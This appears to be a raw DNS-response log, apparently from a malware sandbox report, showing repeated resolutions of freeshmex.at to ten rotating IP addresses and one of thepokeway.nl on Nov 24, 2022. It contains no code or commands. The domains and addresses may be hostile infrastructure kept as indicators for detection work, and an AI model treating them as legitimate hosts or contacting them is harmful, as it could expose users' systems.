                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:26.163016081 CET8.8.8.8192.168.2.40x2242No error (0)thepokeway.nl5.135.247.111A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
